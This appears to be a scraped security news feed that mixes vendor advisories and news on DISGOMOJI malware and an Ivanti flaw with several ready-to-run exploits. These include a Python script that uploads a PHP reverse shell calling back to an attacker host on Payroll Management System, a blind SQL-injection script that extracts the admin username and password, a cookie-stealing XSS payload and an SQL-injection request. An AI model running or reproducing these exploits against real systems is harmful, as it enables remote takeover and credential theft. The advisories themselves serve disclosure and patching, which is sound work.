An arbitrary file upload vulnerability in the Upload Template function of Dolibarr ERP CRM up to v19.0.1 allows attackers to execute arbitrary code via uploading a crafted .SQL file.

**Dolibarr arbitrary file upload vulnerability**

High severity GitHub Reviewed Published Jun 18, 2024 to the GitHub Advisory Database • Updated Jun 18, 2024

GHSA-p7r8-7w87-8g46: Dolibarr arbitrary file upload vulnerability

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.99

Debian Linux Security Advisory 5713-1 - A buffer overflow was discovered in libndp, a library implementing the IPv6 Neighbor Discovery Protocol (NDP), which could result in denial of service or potentially the execution of arbitrary code if malformed IPv6 router advertisements are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5713-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 16, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libndpCVE ID         : CVE-2024-5564A buffer overflow was discovered in libndp, a library implementing theIPv6 Neighbor Discovery Protocol (NDP), which could result in denial ofservice or potentially the execution of arbitrary code if malformedIPv6 router advertisements are processed.For the oldstable distribution (bullseye), this problem has been fixedin version 1.6-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.8-1+deb12u1.We recommend that you upgrade your libndp packages.For the detailed security status of libndp please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libndpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZvJhIACgkQEMKTtsN8TjaFxRAAoZ0KcqyXTKSql5dnEURXQPpbzVnjYd4xnEzbunVupRTJnFmDpF/huBYl+Owh85Et0uUvEwYZIGb5bt47jStw4iBHYSG7AaWWPWmlqPT2izu461AL1njjDJh0i3BPGxTm1lY1k8tnUZkPp08BonJKnesSsogiFy51L0Apmug3/UJu9HrsUGGeVsI3oFHgxQWAe92f/9mTzst0J1BoGYC66n2CUISVUBUmyCBBKiPWbzVX5fSMu5ZAgRCCm+8VcEgFG2zZmOxaWqhlKmWNcraAsJmi4Y4Isp7AsmYFjHogY/jURDf5Y/CcdGuKwyGThk0sU67kbEgQDkCW+40OGU+WuEE+5cU5FytNZzNunsu9BZM+YqwrtRHBZhmJMr1+io9pJaX/a2wQqiHxOsb8wKbWnykDmgXRHd3qAj/XzRjzipebfr+5N7wOee8JritwniCimSSD3Uaev7HdFWO6DbhQZNH+EKpSgAZY0JlM96yIUafH6dwnH3NM/bBYP0iEbm+bXE8emF4XfkAU5TZuvPmsQgKCf8idgcHAE9a0jSv8e5bi4JNa0adLO+0B9RtuOhRGjhTtkkzwYeU1/07vGnQrZasDjZoFgHcnrXqD8hDFVYX4z8T4pn0AMe1BXLaAx83D8JOX2SqP6qiiwOGViSDyZl/JUGQ/zmUf2rEDU6fXBic==ilxi-----END PGP SIGNATURE-----

Debian Security Advisory 5713-1

Payroll Management System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Payroll Management System v1.0 RCE (Unauthenticated)# Google Dork: intitle:"Employee's Payroll Management System"# Date: 16/06/2024# Exploit Author: ShellUnease# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html# Version: v1.0# Tested on: Kali Linux Apache Web Server# CVE : CVE-2024-34833#!/usr/bin/pythonimport argparseimport timeimport requestsclass Exploit:    def __init__(self, rhost, rport, lhost, lport, https):        self.rhost = rhost        self.rport = rport        self.lhost = lhost        self.lport = lport        self.targetUrl = f'https://{rhost}:{rport}' if https else f'http://{rhost}:{rport}'        self.banner()    def banner(self):        print("""  _____                      _ _                                |  __ \                    | | |                               | |__) |_ _ _   _ _ __ ___ | | |                               |  ___/ _` | | | | '__/ _ \| | |                               | |  | (_| | |_| | | | (_) | | |                               |_|  _\__,_|\__, |_|  \___/|_|_|                          _    |  \/  |     __/ |                                       | |   | \  / | __ |___/_   __ _  __ _  ___ _ __ ___   ___ _ __ | |_  | |\/| |/ _` | '_ \ / _` |/ _` |/ _ \ '_ ` _ \ / _ \ '_ \| __| | |  | | (_| | | | | (_| | (_| |  __/ | | | | |  __/ | | | |_  |_|__|_|\__,_|_| |_|\__,_|\__, |\___|_|_|_| |_|\___|_|_|_|\__|  / ____|         | |       __/ |     |  __ \ / ____|  ____|    | (___  _   _ ___| |_ ___ |___/___   | |__) | |    | |__        \___ \| | | / __| __/ _ \ '_ ` _ \  |  _  /| |    |  __|       ____) | |_| \__ \ ||  __/ | | | | | | | \ \| |____| |____     |_____/ \__, |___/\__\___|_| |_| |_| |_|  \_\\_____|______|             __/ |                                                         |___/                                                          """)    def get_data(self):        return {            'name': 'John Doe',            'email': 'jdoe@gmail.com',            'contact': 'John Doe',            'about': 'John Doe',        }    def get_payload(self):        return (f'<?php $sock=fsockopen("{self.lhost}",{self.lport});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, '                f'2=>$sock),$pipes); ?>')    def upload_rev_shell(self):        url = f'{self.targetUrl}/ajax.php?action=save_settings'        print(f'Uploading a reverse shell via {url}')        requests.post(url, files={'img': ('a.php', self.get_payload())},                      data=self.get_data())        epoch = time.time()        timestamp = epoch - (epoch % 60)        timestamp_minus_one_min = timestamp - 60        timestamp_plus_one_min = timestamp + 60        return [f'{int(timestamp)}_a.php', f'{int(timestamp_minus_one_min)}_a.php',                f'{int(timestamp_plus_one_min)}_a.php']    def open_rev_shell(self, candidates):        print('Opening a reverse shell')        for candidate in candidates:            url = f'{self.targetUrl}/assets/img/{candidate}'            try:                requests.get(url).raise_for_status()                print(f'Got a success response for {url}, you should have a revshell')                return            except Exception as e:                print(f'Failed to open revshell using {url}')        print('Guessing filename failed')    def exploit(self):        candidates = self.upload_rev_shell()        self.open_rev_shell(candidates)def get_args():    parser = argparse.ArgumentParser(        description='Payroll Management System - Remote Code Execution (RCE) (Unauthenticated)')    parser.add_argument('-rhost', '--remote-host', dest="rhost", required=True, action='store', help='Remote host')    parser.add_argument('-rport', '--remote-port', dest="rport", required=False, action='store', help='Remote port',                        default=80)    parser.add_argument('-lhost', '--local-host', dest="lhost", required=True, action='store', help='Local host')    parser.add_argument('-lport', '--local-port', dest="lport", required=True, action='store', help='Local port')    parser.add_argument('-https', '--https', dest="https", required=False, action='store_true', help='Use https')    args = parser.parse_args()    return argsif __name__ == '__main__':    args = get_args()    exp = Exploit(args.rhost, args.rport, args.lhost, args.lport, args.https)    exp.exploit()

Payroll Management System 1.0 Remote Code Execution

A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024.
Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems.
"It is a modified version of the public project

Cyber Espionage / Malware

A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024.

Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems.

"It is a modified version of the public project Discord-C2, which uses the messaging service Discord for command and control (C2), making use of emojis for its C2 communication," it said.

It's worth noting that DISGOMOJI is the same "all-in-one" espionage tool that BlackBerry said it discovered as part of an infrastructure analysis in connection with an attack campaign mounted by the Transparent Tribe actor, a Pakistan-nexus hacking crew

The attack chains commence with spear-phishing emails bearing a Golang ELF binary delivered within a ZIP archive file. The binary then downloads a benign lure document while also stealthily downloading the DISGOMOJI payload from a remote server.

A custom-fork of Discord-C2, DISGOMOJI is designed to capture host information and run commands received from an attacker-controlled Discord server. In an interesting twist, the commands are sent in the form of different emojis -

*   🏃‍♂️ - Execute a command on the victim's device
*   📸 - Capture a screenshot of the victim's screen
*   👇 - Upload a file from the victim's device to the channel
*   👈 - Upload a file from the victim's device to transfer\[.\]sh
*   ☝️ - Download a file to the victim's device
*   👉 - Download a file hosted on oshi\[.\]at to the victim's device
*   🔥 - Find and exfiltrate files matching the following extensions: CSV, DOC, ISO, JPG, ODP, ODS, ODT, PDF, PPT, RAR, SQL, TAR, XLS, and ZIP
*   🦊 - Gather all Mozilla Firefox profiles on the victim's device into a ZIP archive
*   💀 - Terminate the malware process on the victim's device

"The malware creates a dedicated channel for itself in the Discord server, meaning each channel in the server represents an individual victim," Volexity said. "The attacker can then interact with every victim individually using these channels."

The company said it unearthed different variations of DISGOMOJI with capabilities to establish persistence, prevent duplicate DISGOMOJI processes from running at the same time, dynamically fetch the credentials to connect to the Discord server at runtime rather than hard coding them, and deter analysis by displaying bogus informational and error messages.

UTA0137 has also been observed using legitimate and open-source tools like Nmap, Chisel, and Ligolo for network scanning and tunneling purposes, respectively, with one recent campaign also exploiting the DirtyPipe flaw (CVE-2022-0847) to achieve privilege escalation against Linux hosts.

Another post-exploitation tactic concerns the use of the Zenity utility to display a malicious dialog box that masquerades as a Firefox update in order to socially engineer users into giving up their passwords.

"The attacker successfully managed to infect a number of victims with their Golang malware, DISGOMOJI," Volexity said. "UTA0137 has improved DISGOMOJI over time."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pakistani Hackers Use DISGOMOJI Malware in Indian Government Cyber Attacks

Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6832-1June 13, 2024virtuoso-opensource vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:Open-Source Edition could be made to crash if it received specially craftedinput.Software Description:- virtuoso-opensource: high-performance databaseDetails:Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectlyhandled certain crafted SQL statements. An attacker could possibly usethis issue to crash the program, resulting in a denial of service.(CVE-2023-31607, CVE-2023-31608, CVE-2023-31609, CVE-2023-31610,CVE-2023-31611, CVE-2023-31616, CVE-2023-31617, CVE-2023-31618,CVE-2023-31619, CVE-2023-31623, CVE-2023-31625, CVE-2023-31628)Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectlyhandled certain crafted SQL statements. An attacker could possibly usethis issue to crash the program, resulting in a denial of service.This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu24.04 LTS. (CVE-2023-31612, CVE-2023-31613, CVE-2023-31614,CVE-2023-31615)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   virtuoso-opensource             7.2.5.1+dfsg1-0.8ubuntu0.1~esm1                                   Available with Ubuntu Pro   virtuoso-opensource-7           7.2.5.1+dfsg1-0.8ubuntu0.1~esm1                                   Available with Ubuntu Pro   virtuoso-opensource-7-bin       7.2.5.1+dfsg1-0.8ubuntu0.1~esm1                                   Available with Ubuntu ProUbuntu 23.10   virtuoso-opensource             7.2.5.1+dfsg1-0.3ubuntu1.1   virtuoso-opensource-7           7.2.5.1+dfsg1-0.3ubuntu1.1   virtuoso-opensource-7-bin       7.2.5.1+dfsg1-0.3ubuntu1.1Ubuntu 22.04 LTS   virtuoso-opensource             7.2.5.1+dfsg1-0.2ubuntu0.1~esm1                                   Available with Ubuntu Pro   virtuoso-opensource-7           7.2.5.1+dfsg1-0.2ubuntu0.1~esm1                                   Available with Ubuntu Pro   virtuoso-opensource-7-bin       7.2.5.1+dfsg1-0.2ubuntu0.1~esm1                                   Available with Ubuntu ProUbuntu 20.04 LTS   virtuoso-opensource             6.1.6+repack-0ubuntu10+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1         6.1.6+repack-0ubuntu10+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1-bin     6.1.6+repack-0ubuntu10+esm1                                   Available with Ubuntu ProUbuntu 18.04 LTS   virtuoso-opensource             6.1.6+repack-0ubuntu9+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1         6.1.6+repack-0ubuntu9+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1-bin     6.1.6+repack-0ubuntu9+esm1                                   Available with Ubuntu ProUbuntu 16.04 LTS   virtuoso-opensource             6.1.6+repack-0ubuntu5+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1         6.1.6+repack-0ubuntu5+esm1                                   Available with Ubuntu Pro   virtuoso-opensource-6.1-bin     6.1.6+repack-0ubuntu5+esm1                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6832-1   CVE-2023-31607, CVE-2023-31608, CVE-2023-31609, CVE-2023-31610,   CVE-2023-31611, CVE-2023-31612, CVE-2023-31613, CVE-2023-31614,   CVE-2023-31615, CVE-2023-31616, CVE-2023-31617, CVE-2023-31618,   CVE-2023-31619, CVE-2023-31623, CVE-2023-31625, CVE-2023-31628Package Information:   https://launchpad.net/ubuntu/+source/virtuoso-opensource/7.2.5.1+dfsg1-0.3ubuntu1.1

Ubuntu Security Notice USN-6832-1

AEGON LIFE version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Life Insurance Management System- SQL injection vulnerability.# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36597# Description:----------------Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.# Payload:------------------client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce-------------------------- -Login with your creds -Navigate to this directory - /client.php -Click on client Status -Will navigate to /clientStatus.php -Capture the request in burp and inject SQLi query in client_id= filed# Burp Request-------------------GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1Host: localhostsec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close

AEGON LIFE 1.0 SQL Injection

A new month, a new high-risk Ivanti bug for attackers to exploit — this time, an SQL injection issue in its centralized endpoint manager.

Source: Phichak via Alamy Stock Photo

Researchers have developed a proof-of-concept (PoC) exploit for a critical vulnerability in Ivanti Endpoint Manager that was recently disclosed — potentially setting the stage for mass exploitation of the devices.

CVE-2024-29824, an SQL injection bug, was first discovered by an independent researcher and sold to Trend Micro's Zero Day Initiative (ZDI). ZDI informed Ivanti of the issue on April 3.

It affects the company's centralized endpoint management solution, an attractive target for any hacker interested in compromising many devices across an organization from one launch point. The issue allows unauthenticated attackers to perform remote code execution (RCE) in the program, earning it a critical 9.8 out of 10 CVSS score.

"Endpoint Manager is usually elevated, so this really allows you to take over an Ivanti system," says Dustin Childs, head of threat awareness at ZDI. "From there, they would be able to affect other systems and do whatever you're using the Endpoint Manager to do."

The specific flaw lay in "RecordGoodApp," a method within a dynamic link library (DLL) file called "PatchBiz," contained within the program's core server. As outlined in a new blog post from Horizon3.ai, which published the PoC on GitHub, an attacker can take advantage of RecordGoodApp's very first string, which does not sufficiently validate user input data before constructing SQL queries. They demonstrated as much by sending a "fairly trivial" request to an endpoint handling events, convincing it to run Windows Notepad.

**Ivanti's Response**

Few organizations in cybersecurity history have been taken to task like Ivanti this year. Initially there were a couple of zero-day vulnerabilities, then another, then a whole lot more. Patches rolled in slowly and exploits skyrocketed, including some especially high-profile cases. Then, just as the bad press was finally starting to die down, this latest vulnerability arrived, equal in posing risk to corporations as any that had come before.

The good news: Childs emphasizes that, despite Ivanti's recent troubles, it handled this latest vulnerability by the book.

"It's not like we had to convince them \[to patch\]. We reported it to them, and they immediately got on it. They produced a patch within six weeks. That's about as good as you're going to see," he says. "So yes, they've had a lot of security problems this year, but they have made tremendous strides in addressing those problems in a very timely manner."

Ivanti published a patch for CVE-2024-29824 alongside its disclosure on May 24. Customers who haven't yet would be well advised to implement it as soon as possible, since threat actors have a history of piling on Ivanti vulnerabilities anyway, and an available, working PoC will likely spur them on further.

Besides patching, organizations can also focus on keeping their management interfaces protected from the wider Web. "Make sure that if your Endpoint Manager is Internet accessible, you restrict it to some very specific IP addresses that are \[trusted\]," Childs says.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

PoC Exploit Emerges for Critical RCE Bug in Ivanti Endpoint Manager

Lost and Found Information System version 1.0 suffers from a reflective cross site scripting vulnerability.

    # Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:#   Lost and Found Information System v1.0 suffers from a Refelcted Cross Site Scripting Vulnerability allowing attackers to execute javascript in context of other users# CVE : CVE-2024-378591) Visit the folowing url to trigger the XSS - http://target.com/admin/?page=<img src=x onerror=alert(document.cookie)>

Lost And Found Information System 1.0 Cross Site Scripting

Lost and Found Information System version 1.0 suffers from an unauthenticated blind boolean-based remote SQL injection vulnerability.

    # Exploit Title: Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:#   Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.# CVE : CVE-2024-37857import requests,string,sys,argparser = requests.Session()proxies = {'http': 'http://127.0.0.1:8080'}admin_path = "/php-lfis/admin/index.php"createCategory_path = "/php-lfis/classes/Master.php"def char_extract(rhost, payload):    params = {"page": "categories/view_category", "id": payload}    response = r.get(rhost+admin_path, params=params)    if "Category ID is not valid" not in response.text:        return True    else:        return False    def sqli(rhost, column):    charset = string.printable    output_length = 200    output = ""    for i in range(output_length):        for char in charset:            # Extracts the credentials of user with id=1, admin by default            payload = "13371337' or char(%s) = (select substring(%s,%s,1) from users where id=1)-- -" % (ord(str(char)),str(column),str(i+1))            sys.stdout.write(f"\r[*] Extracting: {output}\r")            if char_extract(rhost, payload):                output += char                break            elif char == '~' and not char_extract(rhost, payload):                print("[*] Extracting:",output)                return outputdef argsetup():    about  = 'Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)'    parser = argparse.ArgumentParser(description=about)    parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True)    args = parser.parse_args()    return argsdef main():    args   = argsetup()    rhost = args.target    print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))if __name__ == "__main__":    main()

Tag

#sql